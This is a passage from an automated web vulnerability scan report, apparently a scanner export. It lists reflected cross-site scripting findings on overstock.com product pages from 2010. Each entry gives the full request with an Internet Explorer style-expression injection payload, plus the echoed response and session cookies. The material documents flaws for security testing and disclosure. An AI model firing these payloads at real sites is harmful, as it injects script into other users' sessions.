Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:11 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:11 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408111421:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:11 GMT; Path=/
Set-Cookie: mxcproclicks=4863020|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:11 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=49
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 110990

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>MI
...[SNIP]...
<input type="hidden" name="9d217"style="x:expression(alert(1))"f287cfbe090" value="1"/>
...[SNIP]...

2.58. http://www.overstock.com/Clothing-Shoes/Massimo-Genni-Black-Label-Mens-Navy-Stripe-2-button-Wool-Suit/4747448/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Massimo-Genni-Black-Label-Mens-Navy-Stripe-2-button-Wool-Suit/4747448/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bd67"style%3d"x%3aexpression(alert(1))"682ca66b68a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3bd67"style="x:expression(alert(1))"682ca66b68a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Massimo-Genni-Black-Label-Mens-Navy-Stripe-2-button-Wool-Suit/4747448/product.html?3bd67"style%3d"x%3aexpression(alert(1))"682ca66b68a=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:17 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:17 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=4747448|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:17 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408117637:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:17 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=19
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 112794

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Ma
...[SNIP]...
<input type="hidden" name="3bd67"style="x:expression(alert(1))"682ca66b68a" value="1"/>
...[SNIP]...

2.59. http://www.overstock.com/Clothing-Shoes/Milano-Mens-Hipster-Wallet/4097263/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Milano-Mens-Hipster-Wallet/4097263/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19d61"style%3d"x%3aexpression(alert(1))"71b1037c527 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19d61"style="x:expression(alert(1))"71b1037c527 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Milano-Mens-Hipster-Wallet/4097263/product.html?19d61"style%3d"x%3aexpression(alert(1))"71b1037c527=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:00:31 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:00:31 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404831921:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4097263|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:00:31 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:00:31 GMT; Path=/
Keep-Alive: timeout=5, max=60
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 110588

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>Mi
...[SNIP]...
<input type="hidden" name="19d61"style="x:expression(alert(1))"71b1037c527" value="1"/>
...[SNIP]...

2.60. http://www.overstock.com/Clothing-Shoes/Miss-Sixty-Womens-Double-breasted-Peacoat/4862946/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Miss-Sixty-Womens-Double-breasted-Peacoat/4862946/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67e0f"style%3d"x%3aexpression(alert(1))"5456ad3f7ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 67e0f"style="x:expression(alert(1))"5456ad3f7ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Miss-Sixty-Womens-Double-breasted-Peacoat/4862946/product.html?67e0f"style%3d"x%3aexpression(alert(1))"5456ad3f7ca=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:50:11 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:50:11 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:50:11 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4862946|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:50:11 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404211768:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=41
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 115618

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j19.overstock.com ssl:false -->


<head>

<title>Mi
...[SNIP]...
<input type="hidden" name="67e0f"style="x:expression(alert(1))"5456ad3f7ca" value="1"/>
...[SNIP]...

2.61. http://www.overstock.com/Clothing-Shoes/Pawz-by-bearpaw-Womens-Paradise-12-inch-Classic-Boots/4422101/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Pawz-by-bearpaw-Womens-Paradise-12-inch-Classic-Boots/4422101/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5eac5"style%3d"x%3aexpression(alert(1))"c658ba364b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5eac5"style="x:expression(alert(1))"c658ba364b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Pawz-by-bearpaw-Womens-Paradise-12-inch-Classic-Boots/4422101/product.html?5eac5"style%3d"x%3aexpression(alert(1))"c658ba364b=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:58:01 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:58:01 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4422101|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:01 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408281802:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:01 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=56
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 120041

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j15.overstock.com ssl:false -->


<head>

<title>Pa
...[SNIP]...
<input type="hidden" name="5eac5"style="x:expression(alert(1))"c658ba364b" value="1"/>
...[SNIP]...

2.62. http://www.overstock.com/Clothing-Shoes/Peach-Couture-Eco-friendly-Rayon-from-Bamboo-Pashmina/5206424/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Peach-Couture-Eco-friendly-Rayon-from-Bamboo-Pashmina/5206424/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e8d6"style%3d"x%3aexpression(alert(1))"108d0b06648 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9e8d6"style="x:expression(alert(1))"108d0b06648 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Peach-Couture-Eco-friendly-Rayon-from-Bamboo-Pashmina/5206424/product.html?9e8d6"style%3d"x%3aexpression(alert(1))"108d0b06648=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:02:10 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:02:10 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404930413:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5206424|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:10 GMT; Path=/
Keep-Alive: timeout=5, max=12
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 103678

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Pe
...[SNIP]...
<input type="hidden" name="9e8d6"style="x:expression(alert(1))"108d0b06648" value="1"/>
...[SNIP]...

2.63. http://www.overstock.com/Clothing-Shoes/Peach-Couture-Silver-Rayon-from-Bamboo-Pashmina/5286113/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Peach-Couture-Silver-Rayon-from-Bamboo-Pashmina/5286113/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac5ee"style%3d"x%3aexpression(alert(1))"95ea8f2b043 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ac5ee"style="x:expression(alert(1))"95ea8f2b043 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Peach-Couture-Silver-Rayon-from-Bamboo-Pashmina/5286113/product.html?ac5ee"style%3d"x%3aexpression(alert(1))"95ea8f2b043=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:02:51 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:02:51 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=5286113|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:51 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404971351:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:51 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=2
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 105040

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Pe
...[SNIP]...
<input type="hidden" name="ac5ee"style="x:expression(alert(1))"95ea8f2b043" value="1"/>
...[SNIP]...

2.64. http://www.overstock.com/Clothing-Shoes/Peppers-Ambassador-Mens-Floating-Collection-Sunglasses/4099996/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Peppers-Ambassador-Mens-Floating-Collection-Sunglasses/4099996/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b23c2"style%3d"x%3aexpression(alert(1))"428f9b27895 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b23c2"style="x:expression(alert(1))"428f9b27895 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Peppers-Ambassador-Mens-Floating-Collection-Sunglasses/4099996/product.html?b23c2"style%3d"x%3aexpression(alert(1))"428f9b27895=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:57:00 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:57:00 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:57:00 GMT; Path=/
